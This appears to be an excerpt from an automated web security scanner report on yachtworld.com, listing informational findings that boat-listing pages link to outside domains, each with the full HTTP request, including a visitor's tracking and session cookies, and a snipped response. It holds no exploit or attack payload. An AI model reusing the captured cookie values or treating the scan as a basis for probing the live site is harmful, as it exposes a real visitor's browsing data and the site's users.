<li><a href="http://www.yachtworld.de"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_de.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.es"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_es.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.fr"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fr.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.fi"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fi.gif" alt="" border="0"/>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS')" href="http://www.yachtworldcharters.com/" target="_blank">CHARTERS<!--[if IE 7]>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS:Search')" href="http://www.yachtworldcharters.com/" target="_blank"><span>
...[SNIP]...
<li><a onclick="menuClick(this,'ServicesUS:Transport')" href="http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US"><span>
...[SNIP]...

12.48. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=1787065&lang=en&slim=broker&&hosturl=donnellyyachts&&ywo=donnellyyachts&

The response contains the following links to other domains:

http://js.callbutton.net/callbutton.js
http://www.boats.com/boat-transport/index.jsp

Request

GET /core/listing/pl_boat_detail.jsp?&units=Feet&id=1787065&lang=en&slim=broker&&hosturl=donnellyyachts&&ywo=donnellyyachts& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.11.10.1296155835; s_pers=%20s_nr%3D1296156455329%7C1298748455329%3B%20s_lv%3D1296156455331%7C1390764455331%3B%20s_lv_s%3DFirst%2520Visit%7C1296158255331%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:27:30 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 21706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<td><a rel="nofollow" href='http://www.boats.com/boat-transport/index.jsp'><img src='/graphics/button_ship.gif' border=0 alt='Boat Transport'>
...[SNIP]...
</p><script language="javascript" src="http://js.callbutton.net/callbutton.js"></script>
...[SNIP]...

12.49. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?hosturl=galatiyachts&checked_boats=2030202&featuredon=yw-en-TX&slot=1&slim=broker

The response contains the following links to other domains:

http://i123.photobucket.com/albums/o320/galatiyachts/BorderWebsitePictureFlatt.jpg
http://s123.photobucket.com/albums/o320/galatiyachts/?action=view..t=BorderWebsitePictureFlatt.jpg
http://www.boats.com/boat-transport/index.jsp
http://www.galatiyachts.com/
http://www.galatiyachts.com/business.htm

Request

GET /core/listing/pl_boat_detail.jsp?hosturl=galatiyachts&checked_boats=2030202&featuredon=yw-en-TX&slot=1&slim=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:25:04 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<td><a rel="nofollow" href='http://www.boats.com/boat-transport/index.jsp'><img src='/graphics/button_ship.gif' border=0 alt='Boat Transport'>
...[SNIP]...
<center><a href="http://s123.photobucket.com/albums/o320/galatiyachts/?action=view..t=BorderWebsitePictureFlatt.jpg" target="_blank"><img src="http://i123.photobucket.com/albums/o320/galatiyachts/BorderWebsitePictureFlatt.jpg" border="0" alt="Photobucket"></a>
...[SNIP]...
</p>To visit our Business Office, Click <a href="http://www.galatiyachts.com/business.htm"> Here</a>
...[SNIP]...
<p>
Always open at galatiyachts.com, Click <a href="http://www.galatiyachts.com"> Here</a>
...[SNIP]...

12.50. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?sponsored=true&units=Feet&checked_boats=2212114&slim=broker&&hosturl=denisonyachtsales&ywo=denisonyachtsales

The response contains the following links to other domains:

http://linkbox.denisonyachtsales.com/images/boat-financing.jpg
http://linkbox.denisonyachtsales.com/images/boats-for-sale.jpg
http://linkbox.denisonyachtsales.com/images/denison-history.jpg
http://linkbox.denisonyachtsales.com/images/denison-yacht-sales.jpg
http://linkbox.denisonyachtsales.com/images/sell-your-boat.jpg
http://www.denisonyachtsales.com/
http://www.denisonyachtsales.com/family-history
http://www.denisonyachtsales.com/list-your-boat
http://www.denisonyachtsales.com/mls-boat-search
http://www.denisonyachtsales.com/yacht-financing

Request

GET /core/listing/pl_boat_detail.jsp?sponsored=true&units=Feet&checked_boats=2212114&slim=broker&&hosturl=denisonyachtsales&ywo=denisonyachtsales HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:26:17 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
:0;font-size:12px;font-family:Helvetica, Arial, sans-serif;line-height:12px;height:236px; width:474px; background:url(http://linkbox.denisonyachtsales.com/images/bg.jpg) no-repeat; position:relative;"><a href="http://www.denisonyachtsales.com/" target="_blank" title="Yacht Broker" style=" float:left; border:none;"><img src="http://linkbox.denisonyachtsales.com/images/denison-yacht-sales.jpg" alt="Denison Yacht Sales" border="0" /></a>
...[SNIP]...
<div style="float:left;"><a href="http://www.denisonyachtsales.com/mls-boat-search" target="_blank" title="Boats For Sale" style="border:none;"><img src="http://linkbox.denisonyachtsales.com/images/boats-for-sale.jpg" alt="Boats For Sale" border="0" /></a><a href="http://www.denisonyachtsales.com/list-your-boat" target="_blank" title="Sell My Boat" style="border:none;"><img src="http://linkbox.denisonyachtsales.com/images/sell-your-boat.jpg" alt="Boats For Sale" border="0" /></a><a href="http://www.denisonyachtsales.com/yacht-financing" target="_blank" title="Yacht Financing" style="border:none;"><img src="http://linkbox.denisonyachtsales.com/images/boat-financing.jpg" alt="Boats For Sale" border="0" /></a><a href="http://www.denisonyachtsales.com/family-history" target="_blank" title="Denison History" style="border:none;"><img src="http://linkbox.denisonyachtsales.com/images/denison-history.jpg" alt="Denison History" border="0" /></a>
...[SNIP]...

12.51. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_full_detail.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp?slim=broker&boat_id=1787065&ybw=&hosturl=donnellyyachts&&ywo=donnellyyachts&&units=Feet&access=Public&listing_id=65891&url=&hosturl=donnellyyachts&&ywo=donnellyyachts&

The response contains the following link to another domain:

http://www.boats.com/boat-transport/index.jsp

Request

GET /core/listing/pl_boat_full_detail.jsp?slim=broker&boat_id=1787065&ybw=&hosturl=donnellyyachts&&ywo=donnellyyachts&&units=Feet&access=Public&listing_id=65891&url=&hosturl=donnellyyachts&&ywo=donnellyyachts& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=1787065&lang=en&slim=broker&&hosturl=donnellyyachts&&ywo=donnellyyachts&
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.12.10.1296155835; s_pers=%20s_nr%3D1296156706496%7C1298748706496%3B%20s_lv%3D1296156706498%7C1390764706498%3B%20s_lv_s%3DFirst%2520Visit%7C1296158506498%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_detail.jsp%2525253F%25252526units%2525253DFeet%25252526id%2525253D1787065%25252526lang%2525253Den%25252526slim%2525253Dbroker%25252526%25252526hosturl%2525253Ddonnellyyachts%25252526%25252526ywo%2525253Ddonnellyyachts%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_full_detail.jsp%2525253Fslim%2525253Dbroker%25252526boat_id%2525253D1787065%25252526ybw%2525253D%25252526host%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:31:22 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 27627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluste
...[SNIP]...
<td><a rel="nofollow" href='http://www.boats.com/boat-transport/index.jsp'><img src='/graphics/button_ship.gif' border=0 alt='Boat Transport'>
...[SNIP]...

12.52. http://www.yachtworld.com/core/rendering/email-boat.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/rendering/email-boat.htm

Issue detail

The page was loaded from a URL containing a query string:

http://www.yachtworld.com/core/rendering/email-boat.htm?url=legendary&boatId=2266476&units=Feet&officeId=75325&boatUrl=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States

The response contains the following links to other domains:

http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US
http://www.yachtworld.de/
http://www.yachtworld.dk/
